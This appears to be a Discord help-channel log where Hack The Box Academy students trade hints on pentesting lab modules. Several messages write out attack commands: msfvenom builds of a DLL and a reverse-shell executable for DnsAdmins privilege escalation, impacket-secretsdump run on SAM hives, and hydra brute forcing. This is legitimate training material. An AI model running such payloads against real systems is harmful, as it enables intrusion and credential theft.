#modules
What is the hydra command you tried?
hmm that looks good to me, you can increase the number of threads, just don't go too high
48 is my sweet spot
Can i PM someone for a hint in Predictable Reset Token of Broken Authentication?
hey guys, i have some problems. Right now i am stuck at ICMP Tunneling with SOCKS, Pivoting module
when i run sudo ./ptunnel-ng -r10.129.218.215 -R22 the target host returns this issue
has anyone had such a problem?
hello friends, please, i need help on the Password Attacks module, precisely Linux Local Password Attacks: credentials hunting on linux
what i have tried so far is to brute force both kira and will for ssh credentials but had no match.
secondly i tried smb and got nothing, don't know if i am missing something
ok
What exactly is not working?
Not sure if the script or the time in milliseconds
This question?
Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?
If so, read the hint
i think i have done every step.. but the script doesn't give me the flag...
what time do you take?
How many tokens do you generate?
i really don't count but the script ends without any good response
idk if this conversion is ok (2023-08-27 05:28:40am - 1693114120000)
is this your local time or the time that is displayed on the page after you have clicked the button?
Your token is: a09ef146a91a55004ed250582c1e8168
And has been created at 2023-08-27 05:28:40am
Your script must use this time as a basis
From this time you now have to create tokens for each millisecond. +/-1second
Hello, i am stuck in https://academy.hackthebox.com/module/147/section/1638 | Ques: Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt. | I got the Daniel hash, and i mounted the smbshare, i mapped it into the n drive on the current machine | but idk how to PtH using the hash of the daniel user in order to enumerate the smbshare that i mounted in n | any hint?
Hi guys, can anyone help me with this secretsdump error?
impacket-secretsdump LOCAL -sam SAM.save -security SECURITY.save -system SYSTEM.save
[-] read length must be non-negative or -1
[*] Cleaning up...
Do you mean you got "David's" hash but don't know how to pass the hash?
You just have to pass the hash via any methods mentioned in the section, then you can access \DC01\david directly
hello i'm doing nibbles for the first time, Nibbles - Privilege Escalation, but when i try to wget LinEnum.sh i get error 404 file not found?
i've been stuck on this for hours and i can't find the solution
i have downloaded the LinEnum.sh but still code 404, file not found
Hi all. I'm finishing my Academy annual subscription soon. I can keep doing labs and reading the content of completed modules without being subscribed, right?
A question best answered by our support team I think @limber cobalt - I recall this query coming up before, but cannot ensure the accuracy of my recollection as to the answer
I think what you say is correct
But yeah, don't take my word for it
yep, all of the modules you own, either bought using cubes or via a subscription, will be yours for life
the module does show you how to do this part. make sure you are running your python http server in the same directory as your LinEnum.sh
first make sure all 3 of your files are valid and none of them is corrupted or is text by accident. after that, if it still doesn't work, try running impacket in a python virtual environment
so did you run the autogen.sh on your machine or the target machine? if you ran it on the target machine then try running it on your machine
Yep, I solved this problem, idk why, but I tried running autogen.sh from the htb attack box and transferring it to the Ubuntu host, and this worked
As I understood, my workstation did not have the necessary specific libraries, because I had the same issue with dnscat and chisel
So i think the updated content also remains accessible, right?
relying on this https://help.hackthebox.com/en/articles/7891787-canceling-an-academy-subscription I will maintain access to completed modules. Now my question is: updated content as well?
How to break our hearts in two simple clicks.
Again I'd advise reaching out to support for confirmation, but I believe any modules you've completed remain accessible.
I will contact them. Thanks!
oh yep, you own the module itself for life so of course you can access updated content
Is anyone able to give me a nudge on the skills assessment for broken authentication? I keep getting the error "User Support cannot have requested role" and i'm not sure how to proceed.
make sure your python server is set up in the same directory where linenum.sh is in and make sure that port is not protected by a firewall
Hi, I'm stuck on the Pass the Ticket (PtT) from Linux part, with the use of chisel. I have retrieved the ticket from julio and imported it into the KRB5CCNAME variable on my pwnbox. But when I run impacket with proxychains, I get a timeout and this error: |DNS-response|: dc01 does not exist. I followed the part with chisel, the modification of the file /etc/hosts by adding the ip and the domain name, the modification of the file /etc/proxychains, the launching of chisel on my pwnbox, and on ms01 with the ip of my pwnbox. PS: I use my own pwnbox, not the one provided by HTB, and I am well connected to the vpn.
if someone could explain why I'm getting this error, that would be great, thank you.
You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.
Any suggestions or hint without the sql injection method? I'm in mysql server with the creds I found and digging around the databases. thanks
sure shoot me a dm with the cause of that error if you will need help with that
Hey, is anyone here familiar with SOC analyst paths
need help !
with what?
Rubber ducky debugging FTW
if you are having issue with a module just ask here (with the module and section name, your issue, what you try and what didn't work)
Preparation Stage (Part 1)
What should we have prepared and always ready to 'grab and go'?
Mo.. re-read the material
The answer is literally there
I answered as much on your support request
i read it and i think i get it but i think the problem is my way of typing it
so what can i do
DM me what you're entering as the answer
done
Anyone free to help me understand some DNS things
INFORMATION GATHERING - WEB EDITION
Active Subdomain Enumeration
First of all, Tier 2 module, so please don't paste material like that. Check the ToS
Give me a moment to have a read
Thanks and my apologies
if this is for the Bino guy then Getting Started is a tier 0 module but that channel seems to have walkthrough videos for Tier 1-2 modules
sorry i didn't get what i did wrong. i shouldn't paste the yt link?
It's not the link itself, but other content the channel holds
ok i'm sorry, didn't check it
F sorry @shut wraith I gotta go pick up the daughter. The command you provided will return what you need, you just need to filter the output to come to the answer
better to ask your question based on something like the #modules message instead of saying you are following something and it didn't work for you
If anyone else fancies helping and giving nudges, it'd be appreciated
Will be back later
welp guess my shift started
yep but the question wasn't about following something, my machine is different from the video i watched and i can't figure out if it is a hackthebox problem or something. in the video if you try to access the ip via firefox it works, from my VM it doesn't
The IP in the video, you're not literally using that exactly are you?
He's here all the time lol
same thing jarednexgent says and same answer, i'm just having fun helping people
ok i'm dumb but not that much
Sorry, always gotta check the easy answer
maybe they just changed the machine. if somebody could check if connecting via firefox works we can see if im doing something wrong
first, which section are you on again? and did you try scanning the target with nmap? if you did, then is port 80 open?
also just to make sure you use http not https right?
what's the issue? also just want to say i'm not the best when it comes to DNS (to better understand it ask chatGPT) but if you are stuck on the question then i can help with that
i'm on the Getting Started module in section nibbles - enumeration. yep i used nmap and it says there are no open ports, i had to use the -Pn param because it seems to have ping disabled
have you tried using the pwnbox?
oh i think that's the issue, all of the nibbles sections in this module are a Walkthrough
make sure your vpn is setup right and also it's best to try the pwnbox
i didn't since i can use only one per day. i will try to see if this is the problem
try crackstation but if that doesn't work then you probably got the wrong hash
hint you got the wrong file
hint ||nope||
Should I DM u so I don't break ToS?
connecting via vpn with a VM shouldn't be the same as using the pwnbox?
oh the ToS from staff was for another guy and sure
nope it's the same
It was for me because he deleted my messages too
oh
@sick fable if you already have your vpn running then try some basic troubleshooting like running ps aux | grep openvpn to see if you have 2 or more openvpn running at the same time, or try switching your vpn. additionally, because there is a web server running on this target you can try to curl this site for a quick connection test
yep, you got no idea how many people i've helped have this same issue
did you crack the hash?
from the pwnbox it works fine. i'm rebooting the VM, maybe it was a vpn problem
before rebooting i have seen some messages where handshakes failed, btw
based on an error code or a type of error, otherwise i can't know for sure what's wrong, but that could be the vpn so either kill all vpn and re-run yours, or rebooting will do the same thing
i have rebooted but it still doesn't work. the grep openvpn command returns this:
root 1376 0.0 0.1 11032 7596 pts/0 S+ 16:18 0:00 openvpn /home/luca/HTB/VPN/Bbinoz.ovpn
luca 1411 0.0 0.0 6332 712 pts/1 S+ 16:19 0:00 grep --color=auto openvpn
also you can't have the pwnbox and your vpn on at the same time
i don't have a limited pwnbox so i don't know, but if turning off the pwnbox means you are done with the pwnbox for the day then don't, just do it on the pwnbox
oof, didn't know that. i guess i will just do this machine from the pwnbox
yep. thanks for your help!
np
anyone have a good smtp command cheatsheet list
i'm doing the attacking common services
easy assessment
Is there an Active Directory defense module yet?
not entirely for defense but the closest thing is the Windows Attacks &amp; Defense module
me and others have sent many links here before, you can do a quick search here for that, if you can't find any i'll send you some
Ah that's unfortunate, in fundamentals for AD they say they're working on an AD defense module but that module was made early 2022
probably a no go then
yea i've done a quick search, haven't found anything useful
hello everyone! I am currently in the Remote Code Execution (RCE) via the Theme Editor section in the hacking wordpress module. in this section I could not find the answer to the question. can anyone help me how to do it?
Hello friends. I have problem with authority machine, can you help me?
read #welcome and #rules after that use /verify at #bot-commands and ask that at #boxes
In the module Windows Privilege Escalation section DnsAdmins, why does net group "Domain Admins" /dom show the netadm user as part of the Domain Admins group but whoami /priv does not?
Hey, I'm currently stuck on the Linux Privilege Escalation skill assessment. got flag 1-3, now struggling to find a way into the tomcat webapp. from what I've read the creds can be found somewhere but it seems like I'm totally missing something. Anyone able to give me a hint?
Hello all. I'm currently running the Footprinting medium lab and am stuck trying to login to SSMS. I've gone through alex's directory and found the txt file with the sa password, but the password doesn't work to run SSMS as admin. One of the forums mentioned that some of the characters are not what they seem, but the only thing I could think to try was replacing the @ symbol with a period. Can anyone point me in the right direction to get logged into SSMS as admin please?
what's the issue?
for that i ended up having to get a shell because adding into DA didn't work for me, and i do remember something about some guys here who, when troubleshooting this, found out that one of the ways to get it to work is to reboot the machine (not reset)
from my notes it seems like at the bottom of one of the tomcat pages there is a directory, and enumerating from that directory you can find the cred, but of course a bit of enum and you will find the cred
no idea what you mean by SSMS but a hint for that is ||username spraying|| the pass that you have for that user will work for some other user that can access mssql
So instead of an msfvenom dll that adds the user to the Domain Admins group you used an msfvenom dll that gave you a reverse shell running in the DNS server as NT AUTHORITY\SYSTEM?
you're a legend. thank you so much! found it immediately. pretty sure you just saved me a couple of hours and my sanity
my pleasure
not that simple because when dns loads your malicious dll it will have nothing but a rev shell so the whole thing will crash and your shell will die
you have to make this a 2 part thing: make a dll payload that will run a shell and make a shell for that dll to run, something like this
msfvenom -p windows/x64/exec cmd='C:\Users\netadm\reverse.exe' -f dll -o sussy.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o reverse.exe
So sussy.dll gets loaded with dnscmd, then what do you do with reverse.exe?
wouldn't recommend you name your malicious dll that but when the dll is loaded it will run the shell
Do you know why net group "Domain Admins" /dom shows the netadm user as part of the Domain Admins group but the netadm user still can't execute commands that require Domain Admins privileges? It doesn't seem like a very practical exploit if it requires the target machine to be rebooted ?
rebooting is only one of the ways, one of the guys here found a way to make that work
but no idea, the issue is the user isn't fully added to the group so that user can't access admin stuff
and something like a reboot would fix that issue (just that issue)
Hey, do machines contain walkthroughs just like starting point?
There are some "guided" machines, but they are all easy
Hello everyone. Excuse me if this isn't the right channel.
I'm struggling to set up WSL in my Windows VM. Apparently there's something wrong with VirtualBox and nested virtualization (https://github.com/microsoft/WSL/issues/5430). Been using Windows11+WSL for a year but recently switched to Pop!_OS as my host machine.
Has anybody succeeded? Should I just try another hypervisor? I've tried quite a few PWSH commands/approaches but none worked. Thanks.
PS. I tried the Enterprise Evaluation ISO as outlined in the Fundamental module, didn't work and didn't like it, the VM is running Pro N atm
I'm working on the final question of the Pass the Ticket in Linux section of the Password Attacks module. I have a root shell on the linux01 machine and, following the hint, I found the file that contains the Kerberos ticket for linux01. I used keytabextract to find the NTLM hash of the password found in that file, but CrackStation, John, and Hashcat (with rockyou as well as the password.list provided for this module) couldn't crack the password. I'm not sure what I should do with the Kerberos ticket for linux01 to access the //DC01/linux01 share. When I try to use smbclient to access that share, I keep getting permission denied messages.
Let me know if that isn't enough information, and I can show the commands I've used so far to try and access the share. I just don't want to give too much away for people who haven't tried this problem yet.
you guys know any free labs to test my XSS knowledge?
aaand how do i get my role here on discord?
Portswigger academy XSS section
For roles, see #welcome
portswigger
consider using another hypervisor like hyper-v that supports nested virtualization
ok thanks i may try vmware/qemu/kvm. hyper-v is windows-based and im running Linux nowadays
If all you want is linux commands on Windows, cygwin and/or Git Bash might be good alternatives
i dont remember how i got it working originally but i can say i regularly use WSL inside a windows 10 VM with virtualbox
i think there are some bios options that need to be set to allow nested virtualization and might only be supported on certain platforms/cpus
can anyone give me a hint for Metasploit -> Meterpreter, it just says "Find the existing exploit", from what i have found the box is running SMB + RDP so my mind went straight to EternalBlue as 1/2 the modules i've done so far have involved that, but the exploits for that don't seem to be working and nor are any of the other ones i've tried, they all seem to want credentials. am i meant to be bruteforcing some creds? or did i do something else wrong
proper enumeration goes a long way
ok so i've missed something
i think i may have just found it
need to get back into rhythm with this stuff, it's hard to pick back up after a month :p
tbh i probably would have been disappointed if every time i was asked to find an exploit it was eternal blue, but i needed an easy one to get back into things
i found something on a higher port and now have my shell
where do i report a typo in a module?
I'm working on Password Attacks Lab: Medium. I retrieved Docs.zip and unzipped it to get Documentation.docx, which is encrypted. I got the decryption key for the file, but I don't know how to use the key to decrypt the .docx file
open it in libreoffice if you don't have Microsoft Office
Attacking Common Services - Easy
You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.
I found user creds for mysql and I'm trying to read the flag.txt or connect to the system by
adding cmd injection in sql syntax. it's working, I can now do the dir commands from the browser but I can't navigate.
I'm stuck at xampp/docs folder
Any hint? please
You can't do cd from a webshell, it will just execute commands from whatever directory the webshell is in. If you can run dir like you say you can, just specify absolute paths in your arguments and you should be fine.
Thank you I found the file, it actually worked I didn't know this.
finally completed! the labs were fun, I completed the last lab (the hardest) without any help
It worked for me with
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o reverse2.exe
How did you manage to run odat in Oracle TNS section
That takes 7 hours and still gives me nothing
afaik it was good for me
can you tell me whats the problem? I dont remember for that section well
Any answers you need for the odat stuff should come in before the scan completes
I got through it relatively quickly iirc
Just watch the output
The issue is it never give anything just XE and that's it
I'm away from my computer right now, but once I get back I can take a look at it
wait... this is the hardest?
I mean there are three labs at the end of the module, and the last one is the hardest (the lab 3)
any nudges on the "Web Enumeration" flag at the start of the pen test track? Found a few sites, got the creds for one, logged into a cryptic message - cannot for the life of me work out what to do next, can't find any roads to go down
you mean this section? https://academy.hackthebox.com/module/77/section/728
||once you log in that cryptic message you've found is the flag||
^not sure if i should tag as spoiler but just in case
is it?
submit it :)
FFS, I tried that about an hour ago, first thing I tried
but worked just now, I thought I was going crazy - thanks for the sanity check
Hardest in the module, not on the whole path
no worries, i've gone down that rabbit hole before
Can someone tell me if it is unsafe to use a dual boot instead of a vm?
If you're talking about for kali/parrot, you should not be running a pentesting distro baremetal.
can someone please help me in getting answers of nessus skill assessment
That was what I was talking about, when I tried using hashcat on a vm things didn't work much, but ok, I will figure something out, thx!
did they change the academy?
I think my percentages are higher now
they were much lower before I think
yes
my offensive percent went from ~50 to ~60 and I haven't done anything since finishing the CPTS path
You can run hashcat on your host
Can anyone help me out with the first Documents and Reporting Question? So far, I have cracked the ||IPMI hash|| and have two other sets of creds from the notes. I have used ||crackmapexec|| and ||xfreerdp|| to try to get to DC01, but so far, nothing has worked.
go for the low hanging fruit first
you should be able to get DA without even looking at the notes
yes, the dashboard seems to be fixed
I think I will just try enumerating DC01 as if I were starting fresh since I can't get any of the creds to work. Apparently, I've got a lot to learn about AD pentesting still.
everything you need to know about AD pentesting for CPTS is in the AD module, but having an understanding of what the quickest wins are is also important
do you guys pull request on your own solo project?
Depends on context but usually no
Go check out #welcome for information on how to verify so you can access the programming chat :)
I think I am on the right track...I have a good finding. I imagined what it would have been like to have a lazy co-worker and went from there, lol
Just got the first flag of that module
Can someone help please? I'm having an issue with HTB Academy. I'm doing the BASH fundamentals course and one of the exercises asks the following:
Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.
I did the for loop and it iterates correctly but when it reaches 28, instead of giving me the $flag it returns this:
Counter = 28 - Assigning value to Salt
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
140676000277824:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:615:
my loop is correct, but seems like the decrypt method is deprecated?
i'm on getting started module, last page (knowledge check) where i have to try the first box by myself.
i have found the admin pwd from the hash, and i have found the upload menu. upload file doesn't work but reading the html source i have found that it works if i turn off JS. i have tried everything but it lets me upload only non-php files. i tried searching for other php extensions that work the same but no result. can somebody tell me if this is the right path?
the hint tells me to use metasploit but i'm pretty sure there is a way this way too, maybe i'm wrong
I am unable to spawn my target from the password attacks module (Pass the Ticket (PtT) from Linux). It is taking forever.
Ye can't spawn here either, must be a problem on their end
Hopefully they resolve soon
has anyone messaged support yet?
just to give a little bit of a different perspective. i seem to be able to spawn either my target OR my pwnbox, so if you have the option, maybe try your own VMs
I can spawn a target but it seems kinda broken and VPN is also acting up a bit. Gonna do some more testing to figure out what's wrong
lol
which section/question exactly? I can check my notes
Can you show the exact command you're using?
I have the same issue
Ive had it for 15 minutes now
or more
deleted the message cuz i thought they fixed it xd
I switched to TCP VPN now and it worked
Wait a while
wby?
Nicee, almost 50%
do you still need help?
yup
can you show me the code you wrote? I don't need all the code just the one you need to implement and put it in spoiler tags otherwise I'll dm you. Up to you
doing the vulnerability assessment module atm and there's two questions in both the nessus & openvas chapters where you're asked what IP address the hosts you scan use, but they're just in the description of the module as well
free cubes i guess but still
I was able to spawn a target after 1 hour of trying over and over and over again
But now it said "Something went wrong while generating your VPN Key, if this persists please contact support"
yeah I messaged support already. they're investigating but dunno what the progress is looking like
Same issue as well.
i'm trying to find the right exploit with searchsploit but i can't find it. i have found all the versions that the webserver is using, and i think that the key is to use GetSimple CMS 3.3.15 or something but it isn't working. can somebody give me a hint?
I found two ways to do this box. The way you are doing, you already have the info you need in what you just wrote. just 'search' for it, if you are using metasploit
is anyone available to help me understand what i am doing wrong with an xfreerdp command for the Documentation and Reporting module? I have been constantly confused by the directions, and the report already started in the module gives creds and i can get none of them to work. so i am assuming it is a bad xfreerdp command but it could be something else.
what exactly isn't working?
feel free to dm if u prefer
Is anyone able to flag my account to get past the onboarding screen? It's stuck on it and loads directly to it even if I clear all browser files and cache.
Can someone help me with skills assessment in Shells and Payloads chapter?
yo guys, i'm currently doing the live engagement in shells and payloads section 2, i've currently rdp'd to the ip we got given and got the answer to question 2 but now i'm stuck. After looking at the hint it says you can browse to the ip hosted on port 8080 or status.inlanefreight.local but for the life of me i can not find a browser on the rdp box or access it on my kali machine, any help appreciated
proper enumeration goes a long way
Hello, attacking common services : hard, I keep getting this now and it was working fine before, reset machine and my own VM, baffled
The whole academy is there to teach you
And honestly your description constitutes a serious rule break imo
<@&861185840277487616> haven't dared use this tag before but ... general rules, rule #3, look at this guy's about me, appalling in my opinion
ATTACKING WEB APPLICATIONS WITH FFUF
Skills Assessment - Web Fuzzing
Question:
Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains?
First command:
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://$IP/indexFUZZ -fs 985
.phps found
Second command:
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://$IP -H "HOST: academy.htb/indexFUZZ" -fs 985
Nothing
Third Try
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u archive.academy.htb/indexFUZZ
Nothing
Tried to fuzz multiple locations in command using custom sub list made from previous question where I successfully found subs:
ffuf -w subs.txt:SUBS,/usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://$IP -H "HOST: SUBS.academy.htb/indexFUZZ" -fs 985 -fs 0
Nothing
Any help would be appreciated
Much appreciated!
thank you!
Feel free to let us know If you see anything against TOS or something potentially harmful and/or insulting in the future.
Hey @winged hedge can I please get your incredible input on my question (very please)
I would if I had the time as I'm at work I need to finish up a project I've been working on.
you might wanna reduce the lengthiness of your questions, it makes it hard for anyone who wants to help you. From what I see here, you are running an extension fuzz on the wrong vhost, you get nothing because you are fuzzing on the second-level domain/just the domain name and not all vhosts, which is why you wouldn't get the extensions accepted by the domains (plural)
When you figure out the vhosts, you can use a bash script one liner to fuzz all at the same time for valid extensions, something like `for vhost in vhost1 vhost2; do ffuf <SNIP>; done`
you can spawn a browser via the terminal. you don't need an icon necessarily.
i tried using xdg-open <url> but i'm just getting
try using firefox <url>
still no luck
try firefox &
try sensible-browser <url>
Just firefox should work... the & makes it background
it didn't
You're running the terminal as root, which is why it can't find the display.
Also: you should almost never be running as root. There's little to no point in it
type in "exit" then xdg-open <url>
ah that worked thank you
noted
in Powerview.ps1 there is a command Get-NetLocalGroupMember. I am trying to use this tool to find remote powershell capable users for a module. an example command given, Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users", gets me, if i understand, who can RDP to the box, but I can't find documentation on what GroupName is associated with remote PS. can someone guide me to some documentation that gives a hint? The module only seems to cover bloodhound examples... i have tried to list the groups with the command net localgroup but don't see anything that looks to be related to powershell
Hello guys, is it possible to use responder in analyze mode with ligolo ?
sudo responder -I ligolo -A set up the interface for ligolo, but i do not get any llmnr nbt-ns response
users who can psremote belong to the Remote Management Users group I believe, so if you wanna use powerview it would look like this: Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"
Active Directory Enumeration & Attacks - Privileged Access. I haven't been able to RDP to the host for the whole day (When I was able to I got a black screen)
Remote Desktop Users are users who can RDP, entirely 2 different things
I have 0 errors
try some other rdp client
Ah now it works (with another rdp client)
weird
Why does it say the password is wrong?
sign in with the domain logon syntax \
like DOMAIN\User
Hey could anyone help me for the RCE prototype pollution part in HTB Academy ?
anyone did the assembly module? i am on the skill assessment, i was able to get shellcode but it's not executing. i'd love any help
If it's black like that u can try pressing enter
https://academy.hackthebox.com/module/68/section/277 Active Directory Powerview - Enumerating AD Users - Find the second user with a password in the description field. Submit the password as the answer.
someone could sanity check, not sure if the answer is bugged
or I am just dumb lol
nevermind I was submitting the user lol
Hi , just started explosion, answered first question and now next one is not opening , got stuck; refreshed; logged out, and logged in again, seems no solution ... help anyone ?
htb has had some issues today for quite a few people. waiting it out is one thing you can do. also, for future reference, explosion is part of starting point, isnt it? this is academy, thats something else again. see here: #starting-point
@topaz shard thx for informing me and yes i had the wrong channel, just wanted help, i'll be more careful next time, thx a lot
Hello asking again as stuck still , Attacking Common Services : hard, I keep getting this now and it was working fine before, reset machine and my own VM, baffled
I'm working on the last question in Pass the Ticket from Linux in the Password Attacks module. The question asks me to find the Kerberos ticket for the machine Linux01 and use that to find the flag in \DC01\linux01. I found the file containing the ticket for the Linux system (I have root privileges, so I can access this ticket), and I transferred the ticket back to my attack box. I don't know what to do from here. How do I use the ticket to gain access? If the target were a Windows machine, I would use Mimikatz or Rubeus to pass the ticket. Not sure what to do with a Linux target.
You're to read the flag on the share from the box using the ticket you acquired.
Yes, that's what I'm trying to do. I have the ticket corresponding to the machine LINUX01, and I want to use it to access the share \DC01\linux01. But I'm blocked on using the ticket to access the share.
Hello
Maybe someone know how to connect to SMB and read the flag in second question of
Attacking Common Applications
PRTG Network Monitor?
I got the username and password but idk how to connect to smb
I also got the info about the shares
https://i.imgur.com/RCKnxbR.png
really love it when this happens
You can use smbclient to read the flag with the kerberos ticket switch and no password switch, you can glance through the section this is explained there.
you can connect using smbclient with the user & pass
If I try using smbclient to view \DC01\linux01, I get an access denied message. If I try to use kinit and specify the file containing the ticket (there's a hint for this question that talks about the need to get this file) I'm told that the keytab does not contain suitable keys.
When I use keytabextract to get the NTLM hash from the keytab file, the hash is not crackable by John, Hashcat, or crackstation.
Thank you! I just got it. I was using the @inlanefreight.htb domain in my kinit command, but it's just LINUX01$ without the domain. I don't fully understand why though.
Also, thank you @faint rampart
Hi, did anyone finish the skills assessment in introduction to malware analysis and can help me with one of the questions?
did anyone do Introduction to splunk & SPL module?
im currently stuck at the practical exercises
@lean grove @fleet bramble
Just ask the question.
Yes, someone has certainly completed the module
I am doing the footprinting lab - hard and i found my way to the private key. i created a file called id_rsa and put the key in there and chmod'ed the permissions to 600. when i try to ssh using this id_rsa file, i get an error saying 'Load key "id_rsa": invalid format'. sooo, what file type does this file usually have? anyone, please?
how does the student subscription work for modules? if i unlock one module, will i be able to use it even after the subscription?
If you've completely finished it, then yes.
really cool! what does it mean "+ CPE credits submission"? it is a thing given in every subscription plan
CPEs are for certificates
With the modules you can earn CPE credits
oh ok, thx
@acoustic owl since you're here, can you help me with my question? can you say anything about that?
I do not know for sure. Do you have line breaks or extra spaces in the content?
so you suspect an error while copying the key itself rather than something with the file?
did anyone do Introduction to splunk & SPL module?
im currently stuck at the practical exercises
im stuck at this question:
open the "Search & Reporting" application, and find through an SPL search against all data the account name with the highest amount of Kerberos authentication ticket requests. Enter it as your answer.
Hello guys, my basic knowledge about OOP tells me that you can't declare a "full" object of a class until you fully define the class (but you can declare a pointer of that type), but when you overload an operator for that class you just define a function that takes an object of the same class as a parameter. i know this works, but can someone help me understand why or how this WORKS anyway?
What is not working?
i need some help of what to type in the search bar haha, my brain is kinda fried
Then take a break. Read through the section again and then try again.
Try to find out how the event is logged
:)) ok i will try
Yes
as far as i am concerned, the key looks good. no weird line breaks or spaces in there.
mind if i send you a screenshot of the key in a DM?
The key is a text file. The name does not matter in principle. I often call it username.key
Is everything in one line?
no, its a nice block formatting with a neat end line
every row
except the last
is the .key important? I've just got it as id_rsa with no file type
Try to write everything in one line.
No, it is not important
You can name the file whatever you want.
ssh -i /path/to/your.key username@ip
that didnt change anything
oh yeah, this is probably gonna be stupid, but... i do need the public key as well, right?
or is the private key alone enough to login with ssh
You only need the private key
Wait, the last line should contain a line break
so the last line is an empty line?
Yes
while using hydra i get this error "target ssh does not support password authentication (method reply 4)." What should i do? Module is login brute forcing 
Pick something else to brute
is it me or has the vpn or connection been really weird lately?
It is weird today
thank god, i was losing it
What is the best way to escalate priv during an ssh attack?
There's no such thing.
@proud pine but you have to get root access on ssh sometimes, and what i'm asking, what is the best way to approach it, trying to learn here
to clarify, i mean you could ssh with a user you already know but how is the best way once inside to get root
There is no such thing as a 'best way'. You have to enumerate, and determine what is relevant.
Hello! I'm currently stuck on the module "introduction to malware analysis" on the skills assessments section, 4th question. I have no clue how to get through it and have no idea if I even approach it the right way. Is anyone willing to guide/help me? Thanks in advance! Feel free to dm me as well
In the module "Protected Archives", i got a user kira but i need root to be able to get the .zip file, I was wondering what is best practices or how would someone do that?
What did the module tell you to do?
to get the Notes.zip file and decrypt it, i have tried scp to get the file and decrypt with john
Did you zip2john it first
yeah and it said permission denied
How is it permission denied if you're doing that on your own system
Transfer zip > Crack it
you can't transfer it with scp, i tried that, that was my original plan
Tried rsync and curl and both "Permission denied"
There are other possible methods. The other method might work with just copy+paste
what is the difference between absolute and relative sequence numbers? And how do I differentiate between them?
+ if anyone who finished the network analysis module can help me?
i tried doing the cat md5 hash thing and still got Permission denied
Looks like you don't have permission for the file itself not the services/apps you wanted to try
You might need to find or pivot to the owner of the file first
root is the owner of the file
Who has read access? Maybe there are other users with read access
I recall that didn't belong to root before though. It was found in one of the users only
yeah i thought it was weird too because i did locate Notes.zip and that is what is showed
You're in the protected archives section of the password attacks module right? It should belong to kira
I checked the file and it does belong to kira
Yeah, for some reason locate showed it in root. i found it in kira, i wrote a script to go through all users to find that file.
I just uncracked it
thank you @ebon coral
You're welcome
Anyone please?
what is the difference between absolute and relative sequence numbers? And how do I differentiate between them?
???
sorry, been away for the weekend, here is the screenshot, I must be missing something really simple! Or I am completely stupid! I can't even paste an image here!!!
You have to verify before you can post a screen shot check the welcome page
anyone know why I can't unlock a module even though I have enough cubes?
it's like every time i click unlock the layout of the web page changes
Absolute = if I give you a number in the sequence it's guaranteed to be in that spot
Relative means that its location is based off of another reference point.
Like
[0,1,2,4,6,8]
4 is the absolute 4th [3] position of the array. However it is relatively the second position after 1, and 1st position before 6
Try disabling any adblock that may be running (some browsers have a built in blocker)
it works, thanks
Hi, I am thinking after I complete the Nmap module I may switch from the CPTS path to CBBH. I feel like that way I can focus on one type of hacking which feels more linear. I want to be good at web anyways. I think bug bounties would be a great way to gain advanced web app hacking skills.
I'm gonna study some web development to go with it. But my thinking is I want to get it out of the way.
Anyone here solved the secure coding javascript 101 module? I have the question about the last question of the skill assessment, which script I have to upload? The vuln.js or check.js?
You can technically just do the path, if you want to go that route - you don't really have to get the cert unless you just want it. You can sign up for something like hackerone without needing anything. If you did want to do something more advanced like Synack's bug bounty system, I don't think they have a path for CBBH cert, but they do for CPTS.
I know there are varying thoughts on this, I would actually recommend CBBH first. I also watched a youtube with mrb3n and a couple other HTB staff members who recommended this as well. Plus if you go that route you will find a bunch of the CPTS modules are done when you get to it. The first 6 modules on CPTS are worth doing first as well if you wanted.
Just finished the Documents & Reporting module... that lab was a doozy!
Can I get a hint on this one, please?
Password Attacks
Credential Hunting in Linux
Examine the target and find out the password of the user Will. Then, submit the password as the answer.
Have found the attack vector, having trouble transferring the file to the attack host as I can't load the tool that got deleted in .bash_history
Login the kira in ssh and run python server. then you can download to your local vm.
Or you can use scp
Module Shells & Payloads, The Live Engagement Host-2: getting an error when running the 50064.rb exploit. The error is NoMethodError undefined method 'get_cookies' for nil:NilClass. Does anyone know how to fix this? Thanks.
anyone 
@autumn pilot or use pwncat
vuln.js
any idea on how to properly validate the password? 
The password is not relevant.
lol really 
so i just need to validate the ip?
isn't the password in the eval function?
Yes, but think about how to get rid of them
so not using the eval i guess? 
eval is evil
i see 
hi
can i dm you?
no
k
can you give me a tip about the stuff i asked?
again, stop asking for dumb shit, you will get it in your ass
Hey guys, please, I'm really in need of help. I'd highly appreciate it, anyone who did the malware analysis module 4th question in the skills assessment.
What exactly is not working? What do you need help with?
I'm completely clueless as to how to even approach it. It's a bit difficult to explain at the moment since I'm at work right now, just trying to find someone who could help by the time I'm home. Can I dm you and explain it in more detail in like 5 hrs from now? Maybe even earlier a bit.
Yes, write me a dm.
I can't promise that I'll be online at that exact time, but I'll be sure to give you an answer as soon as I'm online.
Awesome! Ty so much
And it's ok, cause soon as I'm home I'm usually free for 5~6 hrs before I go to sleep lol
Hey guys, on modules where you have to RDP into a host to access a subdomain. Is there a way to pipe my machine through the RDP node? My issue is that I'm dead tired of having to use weird computer configs to work and would like to have my own tools on hand. Any idea?
